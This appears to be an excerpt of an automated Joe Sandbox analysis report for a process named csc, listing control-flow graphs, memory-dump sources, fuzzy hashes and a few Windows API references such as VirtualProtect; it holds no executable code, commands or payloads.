                                                                                                                        control_flow_graph 1483 95f89d0-95f89df 1484 95f89f9-95f8a02 1483->1484 1485 95f89e1-95f89ed 1483->1485 1486 95f8a4f-95f8a55 1484->1486 1487 95f8a04-95f8a07 1484->1487 1485->1484 1491 95f89ef-95f89f8 1485->1491 1488 95f8a09-95f8a16 1487->1488 1489 95f8a56-95f8a85 1487->1489 1494 95f8a18-95f8a1e 1488->1494 1495 95f8a46-95f8a4d 1488->1495 1498 95f8a87-95f8a8b call 95f8af0 1489->1498 1499 95f8a94-95f8a98 1489->1499 1494->1489 1497 95f8a20-95f8a30 1494->1497 1495->1486 1495->1487 1505 95f8a32 call 95f8969 1497->1505 1506 95f8a32 call 95f8978 1497->1506 1507 95f8a32 call 95f89d0 1497->1507 1501 95f8a91-95f8a93 1498->1501 1502 95f8a38-95f8a3a 1502->1495 1503 95f8a3c-95f8a45 1502->1503 1505->1502 1506->1502 1507->1502
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: <5'$<5'
                                                                                                                        • API String ID: 0-3241267148
                                                                                                                        • Opcode ID: 6891ee7908be39a9959e0b9cf740eb36595adf7ffeb9ba84b33ea8344f65bfb8
                                                                                                                        • Instruction ID: 167ae90860977239a5cfbe71db7c0c39a714fce39b74a0f33cb77dfb21d4dd69
                                                                                                                        • Opcode Fuzzy Hash: 6891ee7908be39a9959e0b9cf740eb36595adf7ffeb9ba84b33ea8344f65bfb8
                                                                                                                        • Instruction Fuzzy Hash: 2521A1313052408FD7248B6AB954B6AB7E5EFC1331B1585BAE38ECB251DB31EC41C751

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1508 95f2cd0-95f2d03 1509 95f2d05-95f2d10 1508->1509 1510 95f2d12-95f2d1b 1508->1510 1509->1510 1511 95f2d1e-95f2d52 call 95f3468 1509->1511 1514 95f2d54-95f2d65 call 94cf358 1511->1514 1515 95f2da3-95f2dca call 95f1de0 1511->1515 1517 95f2d6a-95f2d6c 1514->1517 1520 95f2fcf-95f2fe1 call 95f2820 1515->1520 1521 95f2dd0-95f2de1 1515->1521 1517->1515 1519 95f2d6e-95f2d99 call 95f1bd0 1517->1519 1519->1515 1529 95f2d9b-95f2da0 1519->1529 1527 95f2fe3-95f2ffb 1520->1527 1528 95f3000-95f3006 1520->1528 1530 95f2dea-95f2ded 1521->1530 1531 95f2de3 1521->1531 1527->1528 1557 95f2ffd 1527->1557 1547 95f3008-95f300f 1528->1547 1548 95f3015-95f305f call 95f4c78 1528->1548 1529->1515 1545 95f2df3-95f2df6 1530->1545 1546 95f2f70-95f2fa1 1530->1546 1531->1530 1532 95f2e9f-95f2eb3 1531->1532 1533 95f2f3a-95f2f4d 1531->1533 1534 95f2eb8-95f2ecc 1531->1534 1535 95f2e58-95f2e6b 1531->1535 1536 95f2e18-95f2e53 1531->1536 1537 95f2f52-95f2f6e 1531->1537 1538 95f2ed1-95f2ee4 1531->1538 1539 95f2e70-95f2e83 1531->1539 1540 95f2f0a-95f2f1c 1531->1540 1541 95f2ee9-95f2f05 1531->1541 1542 95f2e88-95f2e9a 1531->1542 1543 95f2e01-95f2e13 1531->1543 1544 95f2f21-95f2f35 1531->1544 1532->1520 1533->1520 1534->1520 1535->1520 1536->1520 1537->1520 1538->1520 1539->1520 1540->1520 1541->1520 1542->1520 1543->1520 1544->1520 1551 95f2dfc 1545->1551 1552 95f2fa3-95f2fcd 1545->1552 1546->1520 1547->1548 1550 95f3011-95f3013 1547->1550 1574 95f3065 1548->1574 1559 95f3067-95f3069 1550->1559 1551->1520 1552->1520 1557->1528 1571 95f306f-95f3078 1559->1571 1572 95f338d-95f3396 1559->1572 1575 95f308a-95f30ca call 95f1fa0 1571->1575 1576 95f307a-95f3082 1571->1576 1574->1559 1584 95f30de 1575->1584 1585 95f30cc-95f30dc 1575->1585 1576->1575 1586 95f30e0-95f30e2 1584->1586 1585->1584 1585->1586 1588 95f30e4-95f30ff 1586->1588 1589 95f3101-95f3130 1586->1589 1594 95f316d-95f3175 1588->1594 1589->1594 1598 95f3132-95f315e 1589->1598 1596 95f3177-95f3181 1594->1596 1597 95f3183 1594->1597 1599 95f3188-95f318a 1596->1599 1597->1599 1598->1594 1608 95f3160-95f3164 1598->1608 1600 95f318c-95f3192 1599->1600 1601 95f319a-95f320c 1599->1601 1600->1601 1609 95f320e-95f3225 1601->1609 1610 95f3230-95f3256 1601->1610 1608->1594 1609->1610 1612 95f326d 1610->1612 1613 95f3258-95f3263 1610->1613 1614 95f326f-95f328e 1612->1614 1643 95f3265 call 95f5148 1613->1643 1644 95f3265 call 95f50e8 1613->1644 1614->1572 1617 95f3294-95f32a6 call 95f2820 1614->1617 1615 95f326b 1615->1614 1617->1572 1620 95f32ac-95f32c4 1617->1620 1622 95f32fd-95f3315 1620->1622 1623 95f32c6-95f32cf 1620->1623 1628 95f3317-95f3320 1622->1628 1629 95f3345-95f335d 1622->1629 1624 95f32de-95f32e5 1623->1624 1625 95f32d1-95f32d4 1623->1625 1624->1622 1627 95f32e7-95f32f8 1624->1627 1625->1624 1627->1572 1631 95f332f-95f3338 1628->1631 1632 95f3322-95f3325 1628->1632 1629->1572 1635 95f335f-95f3368 1629->1635 1631->1629 1633 95f333a-95f3342 1631->1633 1632->1631 1633->1629 1637 95f336a-95f336d 1635->1637 1638 95f3377-95f3380 1635->1638 1637->1638 1638->1572 1639 95f3382-95f338a 1638->1639 1639->1572 1643->1615 1644->1615
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: S%
                                                                                                                        • API String ID: 0-9707960
                                                                                                                        • Opcode ID: 45ad358044613be916461311f60a40e85c404dd329912188967aab09698cb02d
                                                                                                                        • Instruction ID: 840c68c6a437c1e0cc47c6b0c505240eeb68f7917f303e98e1a7ad6d6d3b50e4
                                                                                                                        • Opcode Fuzzy Hash: 45ad358044613be916461311f60a40e85c404dd329912188967aab09698cb02d
                                                                                                                        • Instruction Fuzzy Hash: C8228B71A102049FDB04DFA9D4A5A6DB7F2FF88360F158069E905EB3A6CB75ED40CB90

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1646 95fd688-95fd6c5 1647 95fd6cc-95fd72b call 95f8620 call 95f89d0 1646->1647 1648 95fd6c7 call 95f8580 1646->1648 1656 95fd80e-95fd894 call 95f7e68 * 2 call 95f7fb8 1647->1656 1657 95fd731-95fd747 1647->1657 1648->1647 1681 95fdad5-95fdae4 1656->1681 1662 95fd78d-95fd7c6 call 95f7e68 call 95f7870 call 95fcf70 1657->1662 1663 95fd749-95fd753 1657->1663 1678 95fd7c8-95fd7db 1662->1678 1679 95fd7f3-95fd809 1662->1679 1663->1656 1665 95fd759-95fd76c 1663->1665 1665->1656 1673 95fd772-95fd788 1665->1673 1673->1656 1678->1679 1686 95fd7dd-95fd7eb 1678->1686 1679->1656 1683 95fdafd 1681->1683 1684 95fdae6-95fdafb 1681->1684 1685 95fdaff-95fdb01 1683->1685 1684->1685 1687 95fd899-95fd8ac call 95f1070 1685->1687 1688 95fdb07-95fdb2c call 95fbef8 1685->1688 1686->1679 1692 95fd8ae-95fd8b4 1687->1692 1693 95fd8c4-95fd8e9 call 95f7e68 1687->1693 1699 95fdb2e-95fdb6e call 95f7870 call 95fa758 1688->1699 1700 95fdb70-95fdb9c 1688->1700 1695 95fd8b8-95fd8ba 1692->1695 1696 95fd8b6 1692->1696 1702 95fd8ef-95fd99d call 95f7870 call 95fbb50 call 95f7e68 call 95fae50 call 95f7fb8 call 95f1070 call 95fdd68 1693->1702 1703 95fd9a8-95fd9e9 call 95f7870 call 95fbb50 1693->1703 1695->1693 1696->1693 1722 95fdba3-95fdc3a call 95f7e00 call 95f8710 call 95fbb50 1699->1722 1700->1722 1723 95fdb9e call 95fa758 1700->1723 1755 95fd9a3 1702->1755 1731 95fd9eb-95fda01 call 95f7e68 1703->1731 1732 95fda21-95fda4d call 95f7fb8 1703->1732 1768 95fdc3c-95fdc4f 1722->1768 1769 95fdc67-95fdc6b 1722->1769 1723->1722 1743 95fdcbc 1731->1743 1744 95fda07-95fda1f 1731->1744 1747 95fda4f-95fda58 1732->1747 1748 95fdaba-95fdad0 1732->1748 1746 95fdcc1-95fdcc8 1743->1746 1744->1731 1744->1732 1751 95fdcca 1746->1751 1752 95fdcd6 1746->1752 1747->1743 1753 95fda5e-95fdab8 call 95f1070 1747->1753 1748->1681 1751->1752 1756 95fdcd7 1752->1756 1753->1747 1753->1748 1755->1748 1756->1756 1768->1769 1773 95fdc51-95fdc5f 1768->1773 1770 95fdc6d-95fdc80 1769->1770 1771 95fdca7-95fdcba 1769->1771 1770->1771 1775 95fdc82-95fdca2 call 95f7870 call 95f8710 1770->1775 1771->1746 1773->1769 1775->1771
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: l`'
                                                                                                                        • API String ID: 0-3145356870
                                                                                                                        • Opcode ID: 2acd57f554b771ae7ded16593bacf0488707527556d5967fea7602bb806d61ed
                                                                                                                        • Instruction ID: 995b99fb5e066c51664461d7f293c4d9ca64fdef04688c7abef19788adf7a525
                                                                                                                        • Opcode Fuzzy Hash: 2acd57f554b771ae7ded16593bacf0488707527556d5967fea7602bb806d61ed
                                                                                                                        • Instruction Fuzzy Hash: 4A120D34A002198FCB14EF65C8A4B9DB7B2BF89310F5185A8E54AAB395DF70ED85CF40

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1781 95f7668-95f76b4 1785 95f76ba-95f76cc 1781->1785 1786 95f7832-95f789e 1781->1786 1789 95f76ce-95f771a 1785->1789 1790 95f771c-95f7765 1785->1790 1799 95f7aed-95f7af4 1786->1799 1800 95f78a4-95f78ad 1786->1800 1822 95f7768-95f77a8 1789->1822 1790->1822 1802 95f78af-95f78b3 1800->1802 1803 95f7923-95f793c 1800->1803 1806 95f78cc-95f78d8 1802->1806 1807 95f78b5-95f78ca 1802->1807 1816 95f7a69-95f7a79 1803->1816 1817 95f7942 1803->1817 1808 95f78e1-95f791e 1806->1808 1807->1808 1808->1799 1829 95f7a7b-95f7a90 1816->1829 1830 95f7a92-95f7a9e 1816->1830 1818 95f7949-95f798c 1817->1818 1819 95f79d9-95f7a1c 1817->1819 1820 95f7991-95f79d4 1817->1820 1821 95f7a21-95f7a64 1817->1821 1818->1799 1819->1799 1820->1799 1821->1799 1836 95f77aa-95f77b0 1822->1836 1837 95f77b2-95f77bc 1822->1837 1831 95f7aa7-95f7ae8 1829->1831 1830->1831 1831->1799 1838 95f77bf-95f77ec 1836->1838 1837->1838 1843 95f77f6-95f7802 1838->1843 1845 95f7828-95f782f 1843->1845 1846 95f7804-95f7820 1843->1846 1846->1845
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: l`'
                                                                                                                        • API String ID: 0-3145356870
                                                                                                                        • Opcode ID: a24695b0b7ec5d77567dbfc5397ee266fd7986ca635f1446b0d90774ff93b00d
                                                                                                                        • Instruction ID: a01b71b78364d04c33eb095160339220f25f6bc8650dd694508240ed4b8ac578
                                                                                                                        • Opcode Fuzzy Hash: a24695b0b7ec5d77567dbfc5397ee266fd7986ca635f1446b0d90774ff93b00d
                                                                                                                        • Instruction Fuzzy Hash: E0D16C32A00214DFDB09CF95C854A99BBB2FF89310F0644A8E649AB232D771ED55DF91
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: l`'
                                                                                                                        • API String ID: 0-3145356870
                                                                                                                        • Opcode ID: 290d421ef43707854844528126acd31dabb3b94866b35fdc1a5181e00d614c01
                                                                                                                        • Instruction ID: 0657110e630ff34c5efe83a0e1fbc9013d22faa7c8e499c7813a1127f39b3cd6
                                                                                                                        • Opcode Fuzzy Hash: 290d421ef43707854844528126acd31dabb3b94866b35fdc1a5181e00d614c01
                                                                                                                        • Instruction Fuzzy Hash: 49F1CA34A00219DFDB04DFA5D9A8E9DB7B2FF88310F119159E906AB3A5DB70EC46CB41
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 04F2ED6C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3785930868.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_4f20000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 544645111-0
                                                                                                                        • Opcode ID: 8ab6a5c414cba4992eb262ceab0e716aa5f93e88663b1bdfdd430506ea0803a6
                                                                                                                        • Instruction ID: c1dabf4c03bdd9664873d67b6e99b04f96917e09d11262dbfb0570899fb17443
                                                                                                                        • Opcode Fuzzy Hash: 8ab6a5c414cba4992eb262ceab0e716aa5f93e88663b1bdfdd430506ea0803a6
                                                                                                                        • Instruction Fuzzy Hash: 3F11E571D003499FDB24DFAAC844B9EFBF5EF48320F54842AD419A7210C775A9458FA1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: l`'
                                                                                                                        • API String ID: 0-3145356870
                                                                                                                        • Opcode ID: cd64a3590c5889534b6f1c4e610d8de8f78dbb01f03e78506f3a901b2bca07f6
                                                                                                                        • Instruction ID: 85338b9f43e5ccf20d1118a48393d2ee5ea0770eb818b466398b0c59ac0d83c3
                                                                                                                        • Opcode Fuzzy Hash: cd64a3590c5889534b6f1c4e610d8de8f78dbb01f03e78506f3a901b2bca07f6
                                                                                                                        • Instruction Fuzzy Hash: 46C1D775A00618CFCB08DFA5D9A4E9EB7B6FF89310F104169E506EB3A4DB31AC42CB51
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: l`'
                                                                                                                        • API String ID: 0-3145356870
                                                                                                                        • Opcode ID: d5560c58f1a75982c743a5b5d6477991a6bb3a44ad16fcace73016d099a299fe
                                                                                                                        • Instruction ID: 19b05905133bff7714f0acba958c63b610c261cdd1d3acb9c6d159522694e704
                                                                                                                        • Opcode Fuzzy Hash: d5560c58f1a75982c743a5b5d6477991a6bb3a44ad16fcace73016d099a299fe
                                                                                                                        • Instruction Fuzzy Hash: 87A169357006158FCB09EF69C464A6E7BB2BFC9710B108659E606DB3A4DF70ED46CB81
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: l`'
                                                                                                                        • API String ID: 0-3145356870
                                                                                                                        • Opcode ID: d64653d3e938322b06e19c3a2d294066c65551027b7ee88bebdc9eccfe19d7ba
                                                                                                                        • Instruction ID: f2bca2e508215393ac90961b1a0f34cb08bd05788751a5c64fa59e10d701b382
                                                                                                                        • Opcode Fuzzy Hash: d64653d3e938322b06e19c3a2d294066c65551027b7ee88bebdc9eccfe19d7ba
                                                                                                                        • Instruction Fuzzy Hash: C4A10C34A002158FDB14DF25C894BA9B7B2BF89310F5085A9E54AEB3A5DF70ED85CF40
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: l`'
                                                                                                                        • API String ID: 0-3145356870
                                                                                                                        • Opcode ID: 0f2ea0e106b8f7c36e7000c12054a4cd4ad6f14913f241381297f3a5b759d6db
                                                                                                                        • Instruction ID: 704c90f114bdec45be979bc1496cc389b2eedcb80a7c9f653743fbf884998c8c
                                                                                                                        • Opcode Fuzzy Hash: 0f2ea0e106b8f7c36e7000c12054a4cd4ad6f14913f241381297f3a5b759d6db
                                                                                                                        • Instruction Fuzzy Hash: FDA1ED34A10219DFCB04EFA5D8A8A9DF7B2FF88310F159159E906AB365DB70EC46CB41
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: l`'
                                                                                                                        • API String ID: 0-3145356870
                                                                                                                        • Opcode ID: 8a325f981fb9e68baa7a2105f4ddbf280724fe268aafe3a69551c32a0d2d5faf
                                                                                                                        • Instruction ID: 3a246cbd655584efa996493dc94cdcc172e9c29cdf80cf999241af2945a645d3
                                                                                                                        • Opcode Fuzzy Hash: 8a325f981fb9e68baa7a2105f4ddbf280724fe268aafe3a69551c32a0d2d5faf
                                                                                                                        • Instruction Fuzzy Hash: 1B713C30B106159FCB04EF65D8A9B6DB7B6BF88710F1481A9E606DB3A5CB30AC05CB91
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: l`'
                                                                                                                        • API String ID: 0-3145356870
                                                                                                                        • Opcode ID: c3ff318388270ad03b078d0c3b2c6201dd10bdb6fc101a4af1ea81ad4ac7c96e
                                                                                                                        • Instruction ID: 0033df10924a3523fe0869d43045480997ab4b77739414e26c93b68dcf0e64ab
                                                                                                                        • Opcode Fuzzy Hash: c3ff318388270ad03b078d0c3b2c6201dd10bdb6fc101a4af1ea81ad4ac7c96e
                                                                                                                        • Instruction Fuzzy Hash: 4B616F34B106058FCB14EF69C469B9DB7B2BF88710F10856AE642D77B0DB74AD4ACB90
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: l`'
                                                                                                                        • API String ID: 0-3145356870
                                                                                                                        • Opcode ID: 78177d748a4631d6661030d12162b9bcaa97843a9397a78a9b49c6b5f7e2231d
                                                                                                                        • Instruction ID: f60d42e2910f195d0cc8c29ada7e63482f728797ba7c889ab0d8d98dd1c00bac
                                                                                                                        • Opcode Fuzzy Hash: 78177d748a4631d6661030d12162b9bcaa97843a9397a78a9b49c6b5f7e2231d
                                                                                                                        • Instruction Fuzzy Hash: 89610A34A10514DFCB04EF65D4A9A6DB7B5BF88710F1481A9EA06DB3A5DB30EC45CB90
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: l`'
                                                                                                                        • API String ID: 0-3145356870
                                                                                                                        • Opcode ID: a1c1ebf2122ca40220bdb2b86766ce82f08e903ce9c080f9597d81c1865cf5fe
                                                                                                                        • Instruction ID: a23f18c2122072308610c607dfa26f5b320f7ae259d87f320209b4eb9da13564
                                                                                                                        • Opcode Fuzzy Hash: a1c1ebf2122ca40220bdb2b86766ce82f08e903ce9c080f9597d81c1865cf5fe
                                                                                                                        • Instruction Fuzzy Hash: 08411370A003448FDB05DB69C8507AEBBF6BF89300F54886DD546DB352DBB4A945CBA1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: >c_
                                                                                                                        • API String ID: 0-1071570120
                                                                                                                        • Opcode ID: d30b5486c5d984dfd987445ca611d9ba83f6b07f53af3779e5d65a0828f1d001
                                                                                                                        • Instruction ID: afb1adc37b44f57e51deeec428dd988ebd4cddb3b856eff6748a9c6008ec4846
                                                                                                                        • Opcode Fuzzy Hash: d30b5486c5d984dfd987445ca611d9ba83f6b07f53af3779e5d65a0828f1d001
                                                                                                                        • Instruction Fuzzy Hash: FB216831A002498FDB04DF64C595ADDBBF2FF89300F2145A9E401BB2A6CB769D45CFA0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: >c_
                                                                                                                        • API String ID: 0-1071570120
                                                                                                                        • Opcode ID: 7d3b7672b3cb3d254f4ab8e801b8e9a51ff41840cc56c9151ab0bbafe31c110e
                                                                                                                        • Instruction ID: 07a032c26b5ec2df1a43fafc062829910799548549c31e6a70f0c4b8c4af7b3b
                                                                                                                        • Opcode Fuzzy Hash: 7d3b7672b3cb3d254f4ab8e801b8e9a51ff41840cc56c9151ab0bbafe31c110e
                                                                                                                        • Instruction Fuzzy Hash: FB212431A002098FDB04DFA9C595ADDB7F2FF88310F2041A5E905BB2A5CB72AD45CBA0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: l`'
                                                                                                                        • API String ID: 0-3145356870
                                                                                                                        • Opcode ID: f426cae09c4872754e6b7ca053d4115971a6b44766542857d0f9f8602ea7c623
                                                                                                                        • Instruction ID: 31ac643eb9a8bca0e813e59c1bc1eb8eb42b77161aa75a610ce80551d784d604
                                                                                                                        • Opcode Fuzzy Hash: f426cae09c4872754e6b7ca053d4115971a6b44766542857d0f9f8602ea7c623
                                                                                                                        • Instruction Fuzzy Hash: B3011B327001145B9714AF2AE8D896AF7EAFFD9725318807AEA06CB329CE71DC058791
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3785930868.0000000004F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F20000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_4f20000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2962429428-0
                                                                                                                        • Opcode ID: 3af2fe9a36e17b2ec5c8b3dd8e26998d1628d88ca2a6e8472cb6ed61e536992d
                                                                                                                        • Instruction ID: 14d15ac3c8eac9e8e1c241d8b162a283232ca28ab6e3436f0c093965e3945372
                                                                                                                        • Opcode Fuzzy Hash: 3af2fe9a36e17b2ec5c8b3dd8e26998d1628d88ca2a6e8472cb6ed61e536992d
                                                                                                                        • Instruction Fuzzy Hash: 1D113A71D003498FDB24DFAAC8447DEFBF5EF88324F248419D419A7244CB75A945CBA4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3787301976.0000000009280000.00000040.00000800.00020000.00000000.sdmp, Offset: 09280000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_9280000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1ecb7ce2e43627637481fdade13adc7f29225ed08bc96cda4a1bd7f6efc498b4
                                                                                                                        • Instruction ID: 0665840ae7fba864b0bed542b2b4d944b7c335bc4935b297d066dae34f27541f
                                                                                                                        • Opcode Fuzzy Hash: 1ecb7ce2e43627637481fdade13adc7f29225ed08bc96cda4a1bd7f6efc498b4
                                                                                                                        • Instruction Fuzzy Hash: 7B02D821BA22168BDB343A750559B7F60D69FC5B50F448079E91BEB3C4DFB08C4D4BA2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 81b2a543068cf6fddda841ce6e0883ed30bf1700240eb979034d1e0b742e69ff
                                                                                                                        • Instruction ID: 5bf604aca7d431d026e1ee55c2e766c95ff18295d97eeb378218e396c6c486f1
                                                                                                                        • Opcode Fuzzy Hash: 81b2a543068cf6fddda841ce6e0883ed30bf1700240eb979034d1e0b742e69ff
                                                                                                                        • Instruction Fuzzy Hash: 5A227A74A012198FCF04CFA6D865BADBBB2BF48310F148059E911EB395DB789D46CF91
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3787301976.0000000009280000.00000040.00000800.00020000.00000000.sdmp, Offset: 09280000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_9280000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ba4ceafa1d8093b29bb9e8ad7ffba6823bb09127cd39a90b2248dda53a870c18
                                                                                                                        • Instruction ID: c94443e0cb1f44a38474b4c162516303fe1b9c434c5f896c22187e094fe9b4a4
                                                                                                                        • Opcode Fuzzy Hash: ba4ceafa1d8093b29bb9e8ad7ffba6823bb09127cd39a90b2248dda53a870c18
                                                                                                                        • Instruction Fuzzy Hash: 45C1AF347912058B8B196F64A16D67FB6E3FFC97417184029E80BE3385EF348C4A8B42
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.3789686277.00000000095F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_95f0000_csc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
